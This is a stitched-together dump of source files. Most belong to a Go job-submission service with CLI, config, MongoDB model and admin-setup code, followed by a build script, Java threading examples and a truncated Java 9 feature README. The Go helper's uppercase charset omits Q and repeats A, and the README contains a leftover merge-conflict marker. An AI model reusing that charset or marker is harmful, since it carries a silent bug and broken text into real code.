log.Infof("dump: [%v]", spew.Sdump(c)) if len(c.Stages) == 0 { c.Stages = ProjectConfigDefaultStages } for _, stage := range c.Stages { if job, ok := c.Jobs[stage]; ok { scripts := []string{} if len(job.Script) > 0 { scripts = append(scripts, job.Script) } scripts = append(scripts, job.Scripts...) e.AddScriptsInStage(stage, scripts...) } else { log.Infof("Stage: %v NOT found...", stage) e.AddScriptsInStage(stage) } } return e } func (c *ProjectConfig) ToPbProjectConfig(rich bool) (pbConfig *pb.ProjectConfig) { pbConfig = &pb.ProjectConfig{ Image: c.Image, Checklist: c.Checklist, TimeoutSec: c.TimeoutSec, MaximumCpu: c.MaximumCpu, MaximumMemMb: c.MaximumMemMb, } return } <file_sep>package client import ( "github.com/argcv/go-argcvapis/app/manul/file" "github.com/argcv/go-argcvapis/app/manul/job" "github.com/argcv/manul/client/workdir" "github.com/argcv/manul/config" "github.com/argcv/webeh/log" "github.com/davecgh/go-spew/spew" "github.com/spf13/cobra" "golang.org/x/net/context" "os" "path" "time" ) func NewManulJobSubmitCommand() *cobra.Command { cmd := &cobra.Command{ Use: "submit", Short: "Job submitting", RunE: func(cmd *cobra.Command, args []string) (err error) { conn := NewGrpcConn() defer conn.Close() jcli := conn.NewJobCli() ctx, cancel := context.WithTimeout(context.Background(), 10*time.Second) defer cancel() auth := config.GetAuthInfo() files := &file.Files{} dir, _ := cmd.Flags().GetString("dir") dir = path.Clean(dir) pid, _ := cmd.Flags().GetString("project") base, _ := os.Getwd() if dir[0] != '/' { // relative path dir = path.Join(base, dir) } fs := workdir.NewWorkdir(dir) _, lastDir := fs.Split() name, _ := cmd.Flags().GetString("name") if name == "" { name = lastDir } log.Infof("user: %v", auth.Name) log.Infof("name: %v", name) log.Infof("base: %v", fs.GetCwd()) fs.IterFiles("/", func(f *file.File) error { log.Infof("file: [%v], [%v]", f.Path, f.Name) files.Data = append(files.Data, f) return nil }) req := &job.CreateJobRequest{ Auth: auth, 
ProjectId: pid, Files: files, } if ret, err := jcli.CreateJob(ctx, req); err != nil { log.Infof("Error: %v", err) } else { log.Infof("Dump: %v", spew.Sdump(ret)) } return }, } cmd.PersistentFlags().String("project", "p", "project id") cmd.PersistentFlags().StringP("dir", "d", ".", "job base dir") return cmd } func NewManulJobCheckCommand() *cobra.Command { cmd := &cobra.Command{ Use: "check", Short: "Job Check", RunE: func(cmd *cobra.Command, args []string) (err error) { conn := NewGrpcConn() defer conn.Close() ctx, cancel := context.WithTimeout(context.Background(), 10*time.Second) defer cancel() jcli := conn.NewJobCli() auth := config.GetAuthInfo() for _, jid := range args { req := &job.GetJobRequest{ Auth: auth, Id: jid, } if ret, err := jcli.GetJob(ctx, req); err != nil { log.Infof("Error: %v", err) } else { log.Infof("Dump: %v", spew.Sdump(ret)) log.Infof("success: %v", ret.Success) log.Infof("msg: %v", ret.Message) if ret.Success { log.Infof(ret.GetJob().Logs) } } } return }, } return cmd } func NewManulJobCommand() *cobra.Command { cmd := &cobra.Command{ Use: "job", Short: "Job Operations", PreRunE: func(cmd *cobra.Command, args []string) (err error) { return }, } cmd.AddCommand( NewManulJobSubmitCommand(), NewManulJobCheckCommand(), ) return cmd } <file_sep>#!/usr/bin/env bash # env TEST_MODE=true ./build.sh TEST_MODE=${TEST_MODE:-false} # Exit Once failed set -Eeuxo pipefail if [ "$TEST_MODE" = true ]; then pushd log go test -v popd # log fi # WITH_TEST go get ./cmd/... 
echo "Build Release" PLATFORM="$(uname -s | tr 'A-Z' 'a-z')" #function is_linux() { # [[ "${PLATFORM}" == "linux" ]] #} #function is_macos() { # [[ "${PLATFORM}" == "darwin" ]] #} export CGO_ENABLED=0 #GOOS=linux export GOOS=${PLATFORM} export BUILD_DATE=$(date '+%Y%m%d%H%M%S%Z') export BUILD_LDFLAGS="-X github.com/argcv/manul/version.GitHash=$(git rev-parse HEAD | cut -c1-8) " export BUILD_LDFLAGS="${BUILD_LDFLAGS} -X github.com/argcv/manul/version.BuildDate=\"${BUILD_DATE}\" " export BUILD_LDFLAGS="${BUILD_LDFLAGS} \"-extldflags='-static'\"" go build -a -ldflags="$BUILD_LDFLAGS" ./cmd/manul # Not in use: entrypoint #env GOOS=linux go build -a -ldflags="$BUILD_LDFLAGS" ./cmd/manul-entrypoint # #if [[ "${GOOS}" != 'linux' ]]; then # go build -o manul-entrypoint-$GOOS -a -ldflags="$BUILD_LDFLAGS" ./cmd/manul-entrypoint #fi<file_sep>package config func GetRpcBind() string { return getStringOrDefault(KeyRpcBind, "0.0.0.0") } func GetRpcHost() string { return getStringOrDefault(KeyRpcHost, "127.0.0.1") } func GetRpcPort() int { return getIntOrDefault(KeyRpcPort, 35000) } func GetRpcOptionMaxRecvMsgSizeMB() int { // 64MB in default return getIntOrDefault(KeyRpcOptionMaxRecvMsgSizeMB, 64) } func GetRpcOptionMaxSendMsgSizeMB() int { // 64MB in default return getIntOrDefault(KeyRpcOptionMaxSendMsgSizeMB, 64) } func GetRpcOptionMaxRecvMsgSize() int { // 64MB in default return GetRpcOptionMaxRecvMsgSizeMB() * 1024 * 1024 } func GetRpcOptionMaxSendMsgSize() int { // 64MB in default return GetRpcOptionMaxSendMsgSizeMB() * 1024 * 1024 } func GetHttpBind() string { return getStringOrDefault(KeyHttpBind, "0.0.0.0") } func GetHttpHost() string { return getStringOrDefault(KeyHttpHost, "127.0.0.1") } func GetHttpPort() int { return getIntOrDefault(KeyHttpPort, 35100) } <file_sep>package service import ( "context" "fmt" pbUser "github.com/argcv/go-argcvapis/app/manul/user" "github.com/argcv/manul/client/mongo" "github.com/argcv/manul/client/workdir" "github.com/argcv/manul/config" 
"github.com/argcv/manul/model" "github.com/argcv/webeh/log" "github.com/pkg/errors" ) type Env struct { UserService *UserServiceImpl SecretService *SecretServiceImpl ProjectService *ProjectServiceImpl JobService *JobServiceImpl // Client mc *mongo.Client fs *workdir.Workdir } const ( DbUserColl = "user" DbSecretColl = "secret" DbProjectColl = "project" DbJobColl = "job" FsProjectDir = "project" FsJobDir = "job" ) const ( SysAssertAdmin = "_root" ) func (env *Env) SpawnMgoCli() *mongo.Client { return env.mc.Spawn() } func (env *Env) SpawnWorkdir() *workdir.Workdir { return env.fs.Spawn() } func (env *Env) SpawnProjectWorkdir() *workdir.Workdir { return env.SpawnWorkdir().Goto(FsProjectDir).Rebase() } func (env *Env) SpawnJobWorkdir() *workdir.Workdir { return env.SpawnWorkdir().Goto(FsJobDir).Rebase() } func (env *Env) ParseAuthInfo(ctx context.Context, auth *pbUser.AuthToken) (user *model.User, err error) { return env.UserService.ParseAuthInfo(ctx, auth) } func (env *Env) DatabaseSetup() (err error) { log.Infof("Check Database Environment...") admin := SysAssertAdmin uopt := model.ParseUserServiceFilterOption(fmt.Sprintf("n:%s", admin)) if ul, err := env.UserService.listUsers(uopt, 0, 100); err != nil { log.Errorf("Find users failed in querying...") return err } else { if len(ul) == 0 { log.Infof("admin NOT found... 
creating users...") if user, secret, err := env.UserService.createUser( admin, "System Admin", "<EMAIL>", model.UserType_ADMIN, admin); err != nil { log.Errorf("create user failed: %v", err) return err } else { config.SetClientUserName(user.Name) config.SetClientUserSecret(secret.Secret) log.Infof("Created user: %s, %sxxxx", user.Name, secret.Secret[:1]) } } else if len(ul) > 1 { errMsg := fmt.Sprintf("found more than 1 admin (%v)?", len(ul)) log.Error(errMsg) err = errors.New(errMsg) return err } else { // only 1 user log.Infof("Admin user %s was created, id: %v", ul[0].Name, ul[0].Id) } } return } func (env *Env) init() error { // user service env.UserService = &UserServiceImpl{ env: env, } env.SecretService = &SecretServiceImpl{ env: env, } // job env.JobService = &JobServiceImpl{ env: env, } // project service env.ProjectService = NewProjectServiceImpl(env) // init client if mc, err := config.InitMongoClient(); err != nil { log.Fatalf("Init Mongo Failed: %v", err.Error()) return err } else { env.mc = mc } log.Infof("Check MongoDB Connection....") { mc := env.SpawnMgoCli() defer mc.Close() if err := mc.Session.Ping(); err != nil { log.Errorf("Mongo Session initialize failed") return err } else { log.Infof("MongoDB Session is initialized") } } env.DatabaseSetup() // fs env.fs = workdir.NewWorkdir(config.GetFsWorkdir()) log.Infof("Base dir: %v", env.fs.Base) return nil } func NewManulGlobalEnv() (env *Env, err error) { env = &Env{} if err = env.init(); err != nil { log.Fatalf("Server Init Failed!!! 
%s", err.Error()) } return } <file_sep>package model import ( pb "github.com/argcv/go-argcvapis/app/manul/user" "github.com/argcv/manul/client/mongo" "gopkg.in/mgo.v2/bson" "strings" "time" ) type UserType pb.UserType const ( // could access everything // used to add/remove users // to/from projects UserType_ADMIN = pb.UserType_ADMIN // used to submit job // for ordinary students UserType_USER = pb.UserType_USER // special authorization // could read project // but can NOT submit job UserType_BOT = pb.UserType_BOT ) type UserServiceFilterOption struct { UserType []pb.UserType Order OrderType // 0: ignore, 1: asc, 2: desc Name string // user name Query string } func ParseUserServiceFilterOption(filter string) (opt *UserServiceFilterOption) { opt = &UserServiceFilterOption{} tags := strings.Split(filter, "|") for _, tag := range tags { if strings.HasPrefix(tag, "t:") { // user type ut := tag[2:] if ut == "admin" { opt.UserType = append(opt.UserType, pb.UserType_ADMIN) } else if ut == "bot" { opt.UserType = append(opt.UserType, pb.UserType_BOT) } else if ut == "user" { opt.UserType = append(opt.UserType, pb.UserType_USER) } } else if strings.HasPrefix(tag, "o:") { // order ot := tag[2:] if ot == "asc" { opt.Order = OrderTypeAsc } else if ot == "desc" { opt.Order = OrderTypeDesc } } else if strings.HasPrefix(tag, "n:") { opt.Name = tag[2:] } else if strings.HasPrefix(tag, "q:") { opt.Query = tag[2:] } } return } type User struct { Id bson.ObjectId `bson:"_id,omitempty" json:"id"` UserType pb.UserType `bson:"user_type,omitempty" json:"user_type,omitempty"` Name string `bson:"name,omitempty" json:"name,omitempty"` DisplayName string `bson:"display_name,omitempty" json:"display_name,omitempty"` Email string `bson:"email,omitempty" json:"email,omitempty"` CreateTime time.Time `bson:"create_time,omitempty" json:"create_time,omitempty"` UpdatedTime time.Time `bson:"updated_time,omitempty" json:"updated_time,omitempty"` CreatedBy string `bson:"created_by,omitempty" 
json:"created_by"` } func (u *User) UpdateTime() *User { if u.CreateTime == time.Unix(0, 0) { u.CreateTime = time.Now() } u.UpdatedTime = time.Now() return u } // from pb & to pb func (u *User) ToPbUser() (pbUser *pb.User) { pbUser = &pb.User{ Id: u.Id.Hex(), UserType: u.UserType, Name: u.Name, DisplayName: u.DisplayName, Email: u.Email, } return } func FromPbUser(u *pb.User) *User { return &User{ Id: mongo.SafeToObjectIdOrEmpty(u.Id), UserType: u.UserType, Name: u.Name, DisplayName: u.DisplayName, Email: u.Email, } } <file_sep>/* * The MIT License (MIT) * * Copyright (c) 2018 <NAME> <<EMAIL>> * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in all * copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE * SOFTWARE. 
* */ package helpers import ( "fmt" "reflect" st "github.com/golang/protobuf/ptypes/struct" ) // ToStruct converts a map[string]interface{} to a ptypes.Struct func ToStruct(v map[string]interface{}) *st.Struct { size := len(v) if size == 0 { return nil } fields := make(map[string]*st.Value, size) for k, v := range v { fields[k] = ToValue(v) } return &st.Struct{ Fields: fields, } } // ToValue converts an interface{} to a ptypes.Value func ToValue(v interface{}) *st.Value { switch v := v.(type) { case nil: return nil case bool: return &st.Value{ Kind: &st.Value_BoolValue{ BoolValue: v, }, } case int: return &st.Value{ Kind: &st.Value_NumberValue{ NumberValue: float64(v), }, } case int8: return &st.Value{ Kind: &st.Value_NumberValue{ NumberValue: float64(v), }, } case int32: return &st.Value{ Kind: &st.Value_NumberValue{ NumberValue: float64(v), }, } case int64: return &st.Value{ Kind: &st.Value_NumberValue{ NumberValue: float64(v), }, } case uint: return &st.Value{ Kind: &st.Value_NumberValue{ NumberValue: float64(v), }, } case uint8: return &st.Value{ Kind: &st.Value_NumberValue{ NumberValue: float64(v), }, } case uint32: return &st.Value{ Kind: &st.Value_NumberValue{ NumberValue: float64(v), }, } case uint64: return &st.Value{ Kind: &st.Value_NumberValue{ NumberValue: float64(v), }, } case float32: return &st.Value{ Kind: &st.Value_NumberValue{ NumberValue: float64(v), }, } case float64: return &st.Value{ Kind: &st.Value_NumberValue{ NumberValue: v, }, } case string: return &st.Value{ Kind: &st.Value_StringValue{ StringValue: v, }, } case error: return &st.Value{ Kind: &st.Value_StringValue{ StringValue: v.Error(), }, } default: // Fallback to reflection for other types return toValue(reflect.ValueOf(v)) } } func toValue(v reflect.Value) *st.Value { switch v.Kind() { case reflect.Bool: return &st.Value{ Kind: &st.Value_BoolValue{ BoolValue: v.Bool(), }, } case reflect.Int, reflect.Int8, reflect.Int16, reflect.Int32, reflect.Int64: return &st.Value{ Kind: 
&st.Value_NumberValue{ NumberValue: float64(v.Int()), }, } case reflect.Uint, reflect.Uint8, reflect.Uint16, reflect.Uint32, reflect.Uint64, reflect.Uintptr: return &st.Value{ Kind: &st.Value_NumberValue{ NumberValue: float64(v.Uint()), }, } case reflect.Float32, reflect.Float64: return &st.Value{ Kind: &st.Value_NumberValue{ NumberValue: v.Float(), }, } case reflect.Ptr: if v.IsNil() { return nil } return toValue(reflect.Indirect(v)) case reflect.Array, reflect.Slice: size := v.Len() if size == 0 { return nil } values := make([]*st.Value, size) for i := 0; i < size; i++ { values[i] = toValue(v.Index(i)) } return &st.Value{ Kind: &st.Value_ListValue{ ListValue: &st.ListValue{ Values: values, }, }, } case reflect.Struct: t := v.Type() size := v.NumField() if size == 0 { return nil } fields := make(map[string]*st.Value, size) for i := 0; i < size; i++ { name := t.Field(i).Name // Better way? if len(name) > 0 && 'A' <= name[0] && name[0] <= 'Z' { fields[name] = toValue(v.Field(i)) } } if len(fields) == 0 { return nil } return &st.Value{ Kind: &st.Value_StructValue{ StructValue: &st.Struct{ Fields: fields, }, }, } case reflect.Map: keys := v.MapKeys() if len(keys) == 0 { return nil } fields := make(map[string]*st.Value, len(keys)) for _, k := range keys { if k.Kind() == reflect.String { fields[k.String()] = toValue(v.MapIndex(k)) } } if len(fields) == 0 { return nil } return &st.Value{ Kind: &st.Value_StructValue{ StructValue: &st.Struct{ Fields: fields, }, }, } default: // Last resort return &st.Value{ Kind: &st.Value_StringValue{ StringValue: fmt.Sprint(v), }, } } } <file_sep>package model import ( pb "github.com/argcv/go-argcvapis/app/manul/secret" "github.com/argcv/manul/client/mongo" "gopkg.in/mgo.v2/bson" "time" ) type Secret struct { Id bson.ObjectId `bson:"_id,omitempty" json:"id"` UserId bson.ObjectId `bson:"user_id,omitempty" json:"user_id"` Secret string `bson:"secret,omitempty" json:"secret"` TempToken string `bson:"temp_token,omitempty" json:"temp_token"` 
CreateTime time.Time `bson:"create_time,omitempty" json:"create_time,omitempty"` UpdatedTime time.Time `bson:"updated_time,omitempty" json:"updated_time,omitempty"` } func (u *Secret) UpdateTime() *Secret { if u.CreateTime == time.Unix(0, 0) { u.CreateTime = time.Now() } u.UpdatedTime = time.Now() return u } func (u *Secret) ToPbSecret() (pbSecret *pb.Secret) { pbSecret = &pb.Secret{ UserId: u.UserId.Hex(), Secret: u.Secret, } return } func FromPbSecret(u *pb.Secret) *Secret { return &Secret{ UserId: mongo.SafeToObjectIdOrEmpty(u.UserId), Secret: u.Secret, } } <file_sep>package client import ( "github.com/argcv/go-argcvapis/app/manul/file" "github.com/argcv/go-argcvapis/app/manul/project" "github.com/argcv/manul/client/workdir" "github.com/argcv/manul/config" "github.com/argcv/webeh/log" "github.com/davecgh/go-spew/spew" "github.com/spf13/cobra" "golang.org/x/net/context" "os" "path" "time" ) func NewManulProjectSubmitCommand() *cobra.Command { cmd := &cobra.Command{ Use: "submit", Short: "Create a new project", RunE: func(cmd *cobra.Command, args []string) (err error) { conn := NewGrpcConn() defer conn.Close() pcli := conn.NewProjectCli() ctx, cancel := context.WithTimeout(context.Background(), 10*time.Second) defer cancel() auth := config.GetAuthInfo() files := &file.Files{} dir, _ := cmd.Flags().GetString("dir") dir = path.Clean(dir) base, _ := os.Getwd() if dir[0] != '/' { // relative path dir = path.Join(base, dir) } fs := workdir.NewWorkdir(dir) _, lastDir := fs.Split() name, _ := cmd.Flags().GetString("name") desc, _ := cmd.Flags().GetString("desc") if name == "" { name = lastDir } log.Infof("user: %v", auth.Name) log.Infof("name: %v", name) log.Infof("desc: %v", desc) log.Infof("base: %v", fs.GetCwd()) fs.IterFiles("/", func(f *file.File) error { log.Infof("file: [%v], [%v]", f.Path, f.Name) files.Data = append(files.Data, f) return nil }) p := &project.Project{ Name: name, Desc: desc, Files: files, } req := &project.CreateProjectRequest{ Auth: auth, 
Project: p, } if ret, err := pcli.CreateProject(ctx, req); err != nil { log.Infof("Error: %v", err) } else { log.Infof("Dump: %v", spew.Sdump(ret)) } return }, } cmd.PersistentFlags().StringP("dir", "d", ".", "project base dir") cmd.PersistentFlags().StringP("name", "n", "", "project name") cmd.PersistentFlags().String("desc", "", "project description") return cmd } func NewManulProjectCommand() *cobra.Command { cmd := &cobra.Command{ Use: "project", Short: "Project Operations", PreRunE: func(cmd *cobra.Command, args []string) (err error) { return nil }, } cmd.AddCommand( NewManulProjectSubmitCommand(), ) return cmd } <file_sep>package shell import ( "github.com/spf13/cobra" ) func NewShellCommand() *cobra.Command { cmd := &cobra.Command{ Use: "shell", Short: "A simple interactive interface", RunE: func(cmd *cobra.Command, args []string) (err error) { env := NewEnv() env.Run() return }, } return cmd } func NewSetupCommand() *cobra.Command { cmd := &cobra.Command{ Use: "setup", Short: "setup server environment (not for client side)", RunE: func(cmd *cobra.Command, args []string) (err error) { env := NewEnv() env.Process("setup") return }, } return cmd } func NewLoginCommand() *cobra.Command { cmd := &cobra.Command{ Use: "login", Short: "user login", RunE: func(cmd *cobra.Command, args []string) (err error) { env := NewEnv() env.Process(append([]string{"login"}, args...)...) 
return }, } return cmd } <file_sep>package model import ( pb "github.com/argcv/go-argcvapis/app/manul/job" "github.com/argcv/manul/client/mongo" "gopkg.in/mgo.v2/bson" ) type Job struct { Id bson.ObjectId `bson:"_id,omitempty" json:"id"` ProjectId bson.ObjectId `bson:"project_id,omitempty" json:"project_id,omitempty"` UserId bson.ObjectId `bson:"user_id,omitempty" json:"user_id,omitempty"` Progress pb.JobProgress `bson:"progress,omitempty" json:"progress,omitempty"` Score int32 `bson:"score,omitempty" json:"score,omitempty"` Log string `bson:"log,omitempty" json:"log,omitempty"` Error *Status `bson:"error,omitempty" json:"error,omitempty"` } func NewJob(uid bson.ObjectId, pid bson.ObjectId) *Job { jid := mongo.NewObjectId() job := &Job{ Id: jid, UserId: uid, ProjectId: pid, Progress: pb.JobProgress_CREATED, Score: 0, Log: "", Error: nil, } return job } // from pb & to pb func (j *Job) ToPbJob() (pbJob *pb.Job) { result := &pb.JobResult{ Score: j.Score, } if j.Error != nil { result.Error = j.Error.ToPbStatus() } pbJob = &pb.Job{ Id: j.Id.Hex(), ProjectId: j.ProjectId.Hex(), UserId: j.UserId.Hex(), Progress: j.Progress, Result: result, Logs: j.Log, } return } func FromPbJob(j *pb.Job) *Job { var score int32 = 0 var err *Status = nil if j.Result != nil { score = j.Result.Score err = FromPbStatus(j.Result.Error) } return &Job{ Id: mongo.SafeToObjectIdOrEmpty(j.Id), ProjectId: mongo.SafeToObjectIdOrEmpty(j.ProjectId), UserId: mongo.SafeToObjectIdOrEmpty(j.UserId), Progress: j.Progress, Score: score, Log: j.Logs, Error: err, } } <file_sep>package helpers import "math/rand" func DistinctStrings(elems ...string) []string { m := map[string]bool{} for _, e := range elems { m[e] = true } var retElems []string for e, _ := range m { retElems = append(retElems, e) } return retElems } var ( CharsetCharUpperCase = []rune("ABCDEFGHIJKLMNOPARSTUVWXYZ") CharsetCharLowerCase = []rune("abcdefghijklmnopqrstuvwxyz") CharsetChars = append(CharsetCharUpperCase, CharsetCharLowerCase...) 
CharsetDigit = []rune("0123456789") CharsetCharDigit = append(CharsetChars, CharsetDigit...) CharsetHex = []rune("0123456789abcdef") ) func RandomString(size int, charset []rune) string { szChar := len(charset) if szChar == 0 { return "" } var buff []rune for i := 0; i < size; i++ { idx := rand.Intn(szChar) buff = append(buff, charset[idx]) } return string(buff) } <file_sep>package config import ( "fmt" "strings" ) type SMTPAuth struct { Username string Password string } func GetSMTPAuth() *SMTPAuth { if getBoolOrDefault(KeyMailSMTPPerformAuth, false) { // with auth user := getStringOrDefault(KeyMailSMTPUserName, "") pass := getStringOrDefault(KeyMailSMTPPassword, "") return &SMTPAuth{ Username: user, Password: <PASSWORD>, } } return nil } type SMTPConfig struct { Host string Port int Sender string DefaultFrom string InsecureSkipVerify bool Auth *SMTPAuth } func (c *SMTPConfig) GetUsername() string { if c.Auth == nil { return "" } else { return c.Auth.Username } } func (c *SMTPConfig) GetPassword() string { if c.Auth == nil { return "" } else { return c.Auth.Password } } func GetSMTPConfig() (cfg *SMTPConfig) { cfg = &SMTPConfig{ Host: getStringOrDefault(KeyMailSMTPHost, ""), Port: getIntOrDefault(KeyMailSMTPPort, 0), Sender: getStringOrDefault(KeyMailSMTPUserSender, ""), InsecureSkipVerify: getBoolOrDefault(KeyMailSMTPInsecureSkipVerify, false), Auth: GetSMTPAuth(), } if cfg.Auth != nil && cfg.DefaultFrom == "" { if strings.Contains(cfg.Auth.Username, "@") { cfg.DefaultFrom = cfg.Auth.Username } else { cfg.DefaultFrom = fmt.Sprintf("%s@%s", cfg.Auth.Username, cfg.Host) } } return }
ae511e490cc6c13686831dd08df5acfd173f9d11
[ "YAML", "Markdown", "Go", "Dockerfile", "Shell" ]
50
YAML
argcv/manul
05a0a08e90a71c132f7d08cadb4e992e5d83b619
dce58d764d303c84c74ecb3efc9a6a0fd334e7f5
refs/heads/master
<repo_name>Spectred/flame-java<file_sep>/concurrent-java/src/main/java/com/spectred/synchronizer/phaser/PhaserThread.java package com.spectred.synchronizer.phaser; import java.util.concurrent.Phaser; public class PhaserThread implements Runnable { private Phaser phaser; public PhaserThread(Phaser phaser) { this.phaser = phaser; } @Override public void run() { System.out.println(Thread.currentThread().getName() + " - 阶段: 0"); phaser.arriveAndAwaitAdvance(); System.out.println(Thread.currentThread().getName() + " - 阶段: 1"); phaser.arriveAndAwaitAdvance(); System.out.println(Thread.currentThread().getName() + " - 阶段: 2"); phaser.arriveAndAwaitAdvance(); } } <file_sep>/thread-java/src/main/java/com/spectred/thread/create/MyThreadPool.java package com.spectred.thread.create; import java.util.concurrent.ExecutorService; import java.util.concurrent.Executors; /** * 线程的创建 * <p>通过线程池创建</p> * 之后会有详细说明 * * @author SWD */ public class MyThreadPool { public static void main(String[] args) { // 通过Executors创建线程池 - ExecutorService executorService = Executors.newCachedThreadPool(); executorService.submit(() -> System.out.println(Thread.currentThread().getName())); executorService.submit(() -> System.out.println(Thread.currentThread().getName())); executorService.submit(() -> System.out.println(Thread.currentThread().getName())); executorService.shutdown(); } } <file_sep>/thread-java/src/main/java/com/spectred/thread/create/MyRunnable.java package com.spectred.thread.create; /** * 线程的创建 * <p>实现Runnable接口</p> * * @author SWD */ public class MyRunnable implements Runnable { @Override public void run() { System.out.println(Thread.currentThread().getName() + " is running ..."); } public static void main(String[] args) { new Thread(new MyRunnable(), "Thread-MyRunnableThread").start(); } } <file_sep>/thread-java/src/test/java/com/spectred/AppTest.java package com.spectred; import static org.junit.Assert.assertTrue; import org.junit.Test; import java.util.ArrayList; import java.util.List; 
/** * Unit test for simple App. */ public class AppTest { /** * Rigorous Test :-) */ @Test public void shouldAnswerWithTrue() { List<Integer> l=new ArrayList<>(); for (int i = 0; i <10 ; i++) { l.add(i); } List<Integer> integers = l.subList(0, 3); System.out.println(integers); assertTrue(true); } } <file_sep>/feature-java/java-9/README.md ## Java9 特性 ### 0. 官方文档与参考链接 ```http https://docs.oracle.com/javase/9/ ``` ```http http://openjdk.java.net/projects/jdk9/ ``` ### 1. 重要特性 #### 1.1 模块化 #### 1.2 进程API改进 #### .3 REPL(JShell) #### 1.4 接口的私有方法 #### 1.5 多版本兼容jar #### 1.6 钻石操作符更新 #### 1.7 try结构更新 #### 1.8 String存储结构更新 #### 1.9 只读集合 #### 1.10 增强的Stream API #### 1.11 Optional提供Stream API #### 1.12 多分辨率图像API #### 1.13 Http/2 Client #### 1.14 Deprecated API #### 1.15 智能Java编译工具 #### 1.16 统一的JVM日志 #### 1.17 java doc 的HTML支持 #### 1.18 动态编译器 ### 附 特性一览 102: [Process API Updates](http://openjdk.java.net/jeps/102) <<<<<<< HEAD 110: [HTTP 2 Client](http://openjdk.java.net/jeps/110) 143: [Improve Contended Locking ](http://openjdk.java.net/jeps/143) 158: [Unified JVM Logging](http://openjdk.java.net/jeps/158) 165: [Compiler Control](http://openjdk.java.net/jeps/165) 193: [Variable Handles](http://openjdk.java.net/jeps/193) 197: [Segmented Code Cache](http://openjdk.java.net/jeps/197) 199: [Smart Java Compilation, Phase Two](http://openjdk.java.net/jeps/199) 200: [The Modular JDK](http://openjdk.java.net/jeps/200) 201: [Modular Source Code](http://openjdk.java.net/jeps/201) 211: [Elide Deprecation Warnings on Import Statements](http://openjdk.java.net/jeps/211) 212: [Resolve Lint and Doclint Warnings](http://openjdk.java.net/jeps/212) 213: [Milling Project Coin](http://openjdk.java.net/jeps/213) 214: [Remove GC Combinations Deprecated in JDK 8](http://openjdk.java.net/jeps/214) 215: [Tiered Attribution for javac](http://openjdk.java.net/jeps/215) 216: [Process Import Statements Correctly](http://openjdk.java.net/jeps/216) 217: [Annotations Pipeline 
2.0](http://openjdk.java.net/jeps/217) 219: [Datagram Transport Layer Security (DTLS)](http://openjdk.java.net/jeps/219) 220: [Modular Run-Time Images](http://openjdk.java.net/jeps/220) 221: [Simplified Doclet API](http://openjdk.java.net/jeps/221) 222: [jshell: The Java Shell (Read-Eval-Print Loop)](http://openjdk.java.net/jeps/222) 223: [New Version-String Scheme](http://openjdk.java.net/jeps/223) 224: [HTML5 Javadoc](http://openjdk.java.net/jeps/224) 225: [Javadoc Search](http://openjdk.java.net/jeps/225) 226: [UTF-8 Property Files](http://openjdk.java.net/jeps/226) 227: [Unicode 7.0](http://openjdk.java.net/jeps/227) 228: [Add More Diagnostic Commands](http://openjdk.java.net/jeps/228) 229: [Create PKCS12 Keystores by Default](http://openjdk.java.net/jeps/229) 231: [Remove Launch-Time JRE Version Selection](http://openjdk.java.net/jeps/231) 232: [Improve Secure Application Performance](http://openjdk.java.net/jeps/232) 233: [Generate Run-Time Compiler Tests Automatically](http://openjdk.java.net/jeps/233) 235: [Test Class-File Attributes Generated by javac](http://openjdk.java.net/jeps/235) 236: [Parser API for Nashorn](http://openjdk.java.net/jeps/236) 237: [Linux/AArch64 Port](http://openjdk.java.net/jeps/237) 238: [Multi-Release JAR Files](http://openjdk.java.net/jeps/238) 240: [Remove the JVM TI hprof Agent](http://openjdk.java.net/jeps/240) 241: [Remove the jhat Tool](http://openjdk.java.net/jeps/241) 243: [Java-Level JVM Compiler Interface](http://openjdk.java.net/jeps/243) 244: [TLS Application-Layer Protocol Negotiation Extension](http://openjdk.java.net/jeps/244) 245: [Validate JVM Command-Line Flag Arguments](http://openjdk.java.net/jeps/245) 246: [Leverage CPU Instructions for GHASH and RSA](http://openjdk.java.net/jeps/246) 247: [Compile for Older Platform Versions](http://openjdk.java.net/jeps/247) 248: [Make G1 the Default Garbage Collector](http://openjdk.java.net/jeps/248) 249: [OCSP Stapling for TLS](http://openjdk.java.net/jeps/249) 250: 
[Store Interned Strings in CDS Archives](http://openjdk.java.net/jeps/250) 251: [Multi-Resolution Images](http://openjdk.java.net/jeps/251) 252: [Use CLDR Locale Data by Default](http://openjdk.java.net/jeps/252) 253: [Prepare JavaFX UI Controls & CSS APIs for Modularization](http://openjdk.java.net/jeps/253) 254: [Compact Strings](http://openjdk.java.net/jeps/254) 255: [Merge Selected Xerces 2.11.0 Updates into JAXP](http://openjdk.java.net/jeps/255) 256: [BeanInfo Annotations](http://openjdk.java.net/jeps/256) 257: [Update JavaFX/Media to Newer Version of GStreamer](http://openjdk.java.net/jeps/257) 258: [HarfBuzz Font-Layout Engine](http://openjdk.java.net/jeps/258) 259: [Stack-Walking API](http://openjdk.java.net/jeps/259) 260: [Encapsulate Most Internal APIs](http://openjdk.java.net/jeps/260) 261: [Module System](http://openjdk.java.net/jeps/261) 262: [TIFF Image I/O](http://openjdk.java.net/jeps/262) 263: [HiDPI Graphics on Windows and Linux](http://openjdk.java.net/jeps/263) 264: [Platform Logging API and Service](http://openjdk.java.net/jeps/264) 265: [Marlin Graphics Renderer](http://openjdk.java.net/jeps/265) 266: [More Concurrency Updates](http://openjdk.java.net/jeps/266) 267: [Unicode 8.0](http://openjdk.java.net/jeps/267) 268: [XML Catalogs](http://openjdk.java.net/jeps/268) 269: [Convenience Factory Methods for Collections](http://openjdk.java.net/jeps/269) 270: [Reserved Stack Areas for Critical Sections](http://openjdk.java.net/jeps/270) 271: [Unified GC Logging](http://openjdk.java.net/jeps/271) 272: [Platform-Specific Desktop 